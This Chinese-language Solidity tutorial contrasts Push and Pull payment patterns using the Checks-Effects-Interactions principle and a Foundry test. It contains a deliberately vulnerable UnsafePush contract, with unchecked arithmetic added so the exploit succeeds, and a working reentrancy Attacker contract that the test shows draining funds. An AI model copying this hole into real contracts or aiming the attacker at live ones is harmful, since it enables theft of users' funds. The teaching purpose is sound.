从这一课开始,我们将会进入实战环节,通过编写测试来学习 Solidity 合约的各种高级用法。
在智能合约中,资金转账是最常见、同时也是最容易出错的操作之一。
如果设计不当,合约可能遭遇 重入攻击、Gas 限制问题,甚至导致资金被锁死。
本课将带你深入理解两种支付模式:
同时,我们会结合 Solidity 的经典安全设计原则 —— Check-Effects-Interactions,来构建安全的资金流动模式。
在 Push 模式下,合约直接在逻辑中调用 transfer 或 call 将资金打到用户地址:
// ❌ 不安全的 Push 模式
function distribute(address payable user, uint256 amount) external {
require(balances[user] >= amount, "Not enough balance");
// 直接转账给用户
(bool success, ) = user.call{value: amount}("");
require(success, "Transfer failed");
balances[user] -= amount;
}问题在于:
receive / fallback 函数可能会再次调用本合约,从而重入逻辑。transfer / send 限制,就会失败,导致资金无法转出。Pull 模式中,合约不再主动转账,而是记录用户的可提余额,让用户自己来领取:
// ✅ 安全的 Pull 模式
mapping(address => uint256) public balances;
function deposit() external payable {
balances[msg.sender] += msg.value;
}
function withdraw() external {
uint256 amount = balances[msg.sender];
require(amount > 0, "No balance");
balances[msg.sender] = 0; // ✅ 先更新状态
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Withdraw failed");
}这样有几个优点:
这是 Solidity 中最经典的安全设计模式之一:
require)应用在提款逻辑中:
function withdraw() external {
// 1. Check
uint256 amount = balances[msg.sender];
require(amount > 0, "No balance");
// 2. Effects
balances[msg.sender] = 0;
// 3. Interactions
(bool success, ) = msg.sender.call{value: amount}("");
require(success, "Withdraw failed");
}对比第 5 课里的 重入攻击 Vault,这里只需改变顺序,就能避免攻击。
我们用 Foundry 编写一个小测试来对比 Push vs Pull 的风险。
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
contract UnsafePush {
mapping(address => uint256) public balances;
function deposit() external payable {
balances[msg.sender] += msg.value;
}
function getBalance(address user) external view returns (uint256) {
return balances[user];
}
function distribute(address payable user, uint256 amount) external {
require(balances[user] >= amount, "Not enough balance");
// ❌ 先转账,后修改状态,容易被重入
(bool success, ) = user.call{value: amount}("");
require(success, "Transfer failed");
unchecked {
balances[user] -= amount;
}
}
}在 Solidity 0.8+ 里,算术运算默认开启了溢出/下溢检查。上面的 UnsafePush 写的是:
balances[user] -= amount;在重入攻击里,这一行可能被重复执行,导致 balances[user] 变成 负数(下溢),于是编译器自动 revert,抛出 panic: arithmetic underflow or overflow (0x11)。
所以用 unchecked { ... } 关闭检查:
function distribute(address payable user, uint256 amount) external {
require(balances[user] >= amount, "Not enough balance");
(bool success, ) = user.call{value: amount}("");
require(success, "Transfer failed");
unchecked {
balances[user] -= amount; // ❌ 可能下溢,但不会 revert
}
}这样,遇到下溢时 balances[user] 会绕回到一个非常大的数(2^256-1 之类),不会再报错。
⚠️ 注意
attacker 窃取资金,而不会因为 panic 被中断。// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "./UnsafePush.sol";
contract Attacker {
UnsafePush public target;
uint256 public reentryCount;
event Deposit(address indexed attacker, uint256 amount);
constructor(address _target) {
target = UnsafePush(_target);
}
function attack() external payable {
target.deposit{value: msg.value}();
emit Deposit(address(this), msg.value); // ✅ 改为打印合约自身
target.distribute(payable(address(this)), msg.value);
}
receive() external payable {
reentryCount++;
uint256 targetBalance = address(target).balance;
if (reentryCount < 3 && targetBalance > 0 ether) {
target.distribute(payable(address(this)), msg.value);
}
}
}// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
contract UnsafePush {
mapping(address => uint256) public balances;
function deposit() external payable {
balances[msg.sender] += msg.value;
}
function getBalance(address user) external view returns (uint256) {
return balances[user];
}
function distribute(address payable user, uint256 amount) external {
require(balances[user] >= amount, "Not enough balance");
// ❌ 先转账,后修改状态,容易被重入
(bool success, ) = user.call{value: amount}("");
require(success, "Transfer failed");
unchecked {
balances[user] -= amount;
}
}
}// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import "../src/UnsafePush.sol";
import "../src/Attacker.sol";
import "../src/SafePull.sol";
contract PushVsPullTest is Test {
UnsafePush push;
SafePull pull;
Attacker attacker;
function setUp() public {
push = new UnsafePush();
pull = new SafePull();
attacker = new Attacker(address(push));
vm.deal(address(this), 10 ether);
}
function testReentrancyOnPush() public {
// 受害者存入 5 ether
push.deposit{value: 5 ether}();
// 攻击者准备 1 ether 并发起攻击
vm.deal(address(attacker), 1 ether);
console.log("Attacker balance before attack:", address(attacker).balance);
attacker.attack{value: 1 ether}();
// 攻击者应能窃取更多资金
assertGt(address(attacker).balance, 2 ether);
console.log(
"Attacker balance after attack:",
address(attacker).balance
);
}
function testSafePullWithdraw() public {
pull.deposit{value: 1 ether}();
// 正常提款
pull.withdraw();
assertEq(address(this).balance, 10 ether); // 提款成功
}
receive() external payable {}
}运行测试:
➜ tutorial git:(main) ✗ forge test --match-path test/PushVsPull.t.sol -vvv
[⠊] Compiling...
[⠒] Compiling 1 files with Solc 0.8.30
[⠑] Solc 0.8.30 finished in 560.45ms
Compiler run successful!
Ran 2 tests for test/PushVsPull.t.sol:PushVsPullTest
[PASS] testReentrancyOnPush() (gas: 137093)
Logs:
Attacker balance before attack: 1000000000000000000
Attacker balance after attack: 4000000000000000000
[PASS] testSafePullWithdraw() (gas: 29940)
Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 1.00ms (164.71µs CPU time)
Ran 1 test suite in 152.91ms (1.00ms CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)你会看到:
这是 Solidity 合约中最经典的安全设计模式之一,几乎所有涉及资金的逻辑都应该遵循。